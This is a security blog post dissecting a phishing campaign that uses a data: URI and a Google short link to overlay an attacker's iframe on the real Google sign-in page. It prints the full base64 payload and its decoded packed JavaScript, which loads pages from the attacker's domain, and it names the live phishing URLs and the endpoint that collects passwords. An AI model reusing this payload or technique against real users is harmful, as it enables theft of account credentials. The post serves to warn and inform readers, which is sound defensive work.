Phishing Via JavaScript Google This Time Not PayPal

Phishing

Following on from this post which gained lots of attention, I have been told about a new one today. This one fulfils our worse fears and the entire phish is performed on a website that actually is the genuine Google log in page and really makes you believe that you are entering your Google credentials only on the genuine Google page, but in fact you are sending your details to the phisher whilst on the genuine Google site.

There is no way on this earth that any normal person could know that the Google short url link was not a genuine Google log on page.

I haven’t seen an email, so I have no idea what the original email looked like, but the link was to a Google short URL http://goo.gl/NL4EmV that according to the Google short url service ( If you put a + after a goo.gl url, you get a Google page with the stats & destination ) redirects to http://zg.al/Z46Qd where I couldn’t get any further using either IE or Chrome. I just ended up on what looked like and actually is the genuine Google account page. I used Firefox using noscript where this trick doesn’t work and ended up on http://nwfacilities.top/aboutus/benionshesre.htm where we get this set of instructions by using view source.

Update: shortly after publishing this post & reporting the http://goo.gl/NL4EmV to Google , they removed that short URL redirect. However the nwfacilities page is still active & live and it will be trivial for the phisher to create other short urls on Goo.gl and malspam them out.
<meta http-equiv=”Refresh” content=”0; url=data:text/html,https://accounts.google.com/ServiceLogin?service=mail&passive=true&rm=false&continue
<script src=data:text/html;base64,ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4oYzxhPycnOmUo cGFyc2VJbnQoYy9hKSkpKygoYz1jJWEpPjM1P1N0cmluZy5mcm9tQ2hhckNvZGUoYysyOSk6Yy50 b1N0cmluZygzNikpfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKXtkW2Uo YyldPWtbY118fGUoYyl9az1bZnVuY3Rpb24oZSl7cmV0dXJuIGRbZV19XTtlPWZ1bmN0aW9uKCl7 cmV0dXJuJ1xcdysnfTtjPTF9O3doaWxlKGMtLSl7aWYoa1tjXSl7cD1wLnJlcGxhY2UobmV3IFJl Z0V4cCgnXFxiJytlKGMpKydcXGInLCdnJyksa1tjXSl9fXJldHVybiBwfSgnMy4yLmo9ImkgaCBr IGwgbiI7bXsoZygpe2YgMT0zLjIuOShcJzFcJyk7MS44PVwnNy94LTRcJzsxLmE9XCdiIDRcJzsx LmM9XCdcJzsyLnAoXCdCXCcpWzBdLkMoMSl9KCkpfUUoZSl7fTMuMi56Lnk9Ijw2IHM9XFwicjov L3EudC91L3cudlxcIiBvPVxcIkQ6IDA7QTogNSU7ZDo1JVxcIj48LzY+IjsnLDQxLDQxLCd8bGlu a3xkb2N1bWVudHx3aW5kb3d8aWNvbnwxMDB8aWZyYW1lfGltYWdlfHR5cGV8Y3JlYXRlRWxlbWVu dHxyZWx8c2hvcnRjdXR8aHJlZnxoZWlnaHR8fHZhcnxmdW5jdGlvbnxoYXZlfFlvdXx0aXRsZXxi ZWVufFNpZ25lZHx0cnl8b3V0fHN0eWxlfGdldEVsZW1lbnRzQnlUYWdOYW1lfG53ZmFjaWxpdGll c3xodHRwfHNyY3x0b3B8YWJvdXR1c3xodG1sfHJlY2tpb3JlbnN8fG91dGVySFRNTHxib2R5fHdp ZHRofGhlYWR8YXBwZW5kQ2hpbGR8Ym9yZGVyfGNhdGNoJy5zcGxpdCgnfCcpLDAse30pKQ==></script>“>
So you can see from that you actually end up on the genuine Google log in page https://accounts.google.com/ServiceLogin BUT the sting is in the base 64 encoded text which is decoded to
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘3.2.j=”i h k l n”;m{(g(){f 1=3.2.9(\’1\’);1.8=\’7/x-4\’;1.a=\’b 4\’;1.c=\’\’;2.p(\’B\’)[0].C(1)}())}E(e){}3.2.z.y=”<6 s=\\”r://q.t/u/w.v\\” o=\\”D: 0;A: 5%;d:5%\\”></6>”;’,41,41,’|link|document|window|icon|100|iframe|image|type|createElement|rel|shortcut|href|height||var|function|have|You|title|been|Signed|try|out|style|getElementsByTagName|nwfacilities|http|src|top|aboutus|html|reckiorens||outerHTML|body|width|head|appendChild|border|catch’.split(‘|’),0,{}))

What this basically does is send your browser to https://accounts.google.com/ServiceLogin with http://nwfacilities.top/aboutus/reckiorens.html#identifier actually loaded via a scripted iframe that replaces the genuine Google page. On pressing the submit button you are forwarded to http://nwfacilities.top/aboutus/reckiorens.html#password while your details are sent to http://nwfacilities.top/aboutus/1.php which only works if coming via the reckiorens.html otherwise you get a 403 forbidden error message, all the time the https://accounts.google.com/ServiceLogin appears in the URL bar of the browser making you convinced that you are actually on the genuine Google site.

This is the Genuine Google page that you are on while your browser still has the http://nwfacilities.top pages & JavaScript still loaded but hidden to view completely and performing all the nefarious actions and stealing your information. The only difference between you going to the Google log in page yourself & this one are the words data:text/html, at the start of the url.

This only appears to work in Google Chrome because Internet Explorer gives this message and doesn’t know what to do with data:text/html commands in the browser ( thankfully). Firefox just gives a blank page until you use the view source option

I have just found this Wikipedia entry that says:

Malware And phishing

The data URI can be utilized by criminals to construct attack pages that attempt to obtain usernames and passwords from unsuspecting web users. It can also be used to get around site cross-scripting restrictions, embedding the attack payload fully inside the address bar, and hosted via URL shortening services rather than needing a full website that is owned by the criminal.

So it is known about, although I have never previously seen it used. a link from Wikipedia gave me https://nakedsecurity.sophos.com/2012/08/31/phishing-without-a-webpage-researcher-reveals-how-a-link-itself-can-be-malicious/ which describes a similar type of attack

Total
1
Shares
Leave a Reply

Your email address will not be published.

Related Posts
Phishing
Read More

Halifax Phishing

This Halifax phishing attempt starts with an email saying Your Account pretending to come from Halifax <update@halifax.co.uk> is…